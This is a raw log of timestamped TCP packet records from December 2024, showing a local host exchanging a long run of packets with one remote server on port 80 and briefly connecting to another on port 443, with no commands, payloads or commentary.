Dec 17, 2024 06:03:22.612607002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.612674952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.613646984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.613780022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.613873005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.614754915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.614795923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.614856005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.615834951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.615848064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.615961075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.615964890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.616029024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.616942883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.617053986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.617084980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.617158890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.618045092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.618172884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.618177891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.618304014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.619168997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.619234085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.619276047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.619354963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.620335102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.620413065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.620588064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.621409893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.621519089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.621676922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.622519970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.622575998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.622613907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.623670101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.623740911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.623800039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.623850107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.624747038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.624876022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.624943018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.625865936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.625976086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.626125097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.627044916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.627109051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.627113104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.627913952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.627983093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.628086090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.628158092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.629101038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.629203081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.629225016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.630207062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.630305052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.630331039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.630359888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.631345987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.631470919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.631647110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.632442951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.632546902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.632749081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.633563995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.633636951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.633781910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.634825945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.634881973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.634972095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.635821104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.635843992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.635968924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.636135101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.636914015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.636990070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.637080908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.638031960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.638089895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.638252974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.638525009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.728579998 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:22.728674889 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:22.728789091 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:22.729159117 CET	49866	443	192.168.2.5	104.121.10.34
Dec 17, 2024 06:03:22.729207993 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:22.772974014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.773039103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.773155928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.773456097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.773603916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.773753881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.774610996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.774682999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.774717093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.775671005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.775794983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.775830030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.776804924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.776895046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.776907921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.776936054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.777894974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.777966976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.778065920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.779043913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.779166937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.779319048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.780148983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.780239105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.780380964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.781236887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.781339884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.781366110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.782351971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.782428980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.782461882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.783452034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.783591986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.783616066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.783760071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.784594059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.784694910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.784789085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.785702944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.785864115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.785938978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.786797047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.786909103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.786919117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.787930965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.787950039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.787996054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.788042068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.788116932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.789047956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.789201975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.789202929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.789439917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.790159941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.790193081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.790266037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.790266037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.791294098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.791352034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.791515112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.791560888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.792383909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.792493105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.792563915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.793494940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.793553114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.793613911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.794624090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.794722080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.794730902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.795727968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.795783043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.795790911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.796825886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.796955109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.796976089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.797029972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.797991037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.798101902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.798216105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.799068928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.799174070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.799221039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.800187111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.800288916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.800339937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.801299095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.801354885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.801357985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.802395105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.802475929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.802509069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.803515911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.803587914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.803621054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.803699970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.804630041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.804692984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.804786921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.805752993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.805877924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.805959940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.806866884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.806921005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.806960106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.807828903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.807961941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.808007956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.808082104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.808252096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.809070110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.809207916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.809334040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.809334040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.810189962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.810317039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.810415030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.811331034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.811414003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.811446905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.812443972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.812517881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.812598944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.812721968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.813544035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.813663960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.813769102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.814667940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.814799070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.814889908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.815768003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.815825939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.815902948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.816905975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.816956043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.816979885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.817991972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.818048000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.818088055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.818371058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.819093943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.819170952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.819283009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.820171118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.820324898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.820341110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.820395947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.820395947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.821449995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.821499109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.821552992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.821643114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.822563887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.822679043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.822753906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.823654890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.823769093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.823865891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.824790001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.824879885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.824920893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.825895071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.825984955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.825988054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.826982975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.827071905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.827104092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.827239990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.828130960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.828274012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.828407049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.829235077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.829363108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.829677105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.830319881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.830414057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.830430984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.831840038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.965130091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.965172052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.965195894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.965260983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.965830088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.965939045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.965960979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.965977907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.966761112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.966850996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.966886997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.966952085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.967849016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.967921972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.967979908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.968131065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.968945980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.969012976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.969068050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.969118118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.970088005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.970185041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.970187902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.970263958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.971204042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.971231937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.971297026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.972289085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.972415924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.972424984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.972560883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.973437071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.973495960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.973583937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.973948956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.974505901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.974627972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.974760056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.975632906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.975688934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.975724936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.975796938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.976741076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.976855993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.976861954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.976913929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.977880001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.977979898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.978041887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.978987932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.979080915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.979336023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.980074883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.980217934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.980343103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.981224060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.981319904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.981329918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.981401920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.982309103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.982398987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.982512951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.982795954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.983442068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.983536959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.983844995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.984549046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.984657049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.984668016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.984895945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.985644102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.985661983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.985711098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.985789061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.986768961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.986869097 CET	49850	80	192.168.2.5	31.41.244.11
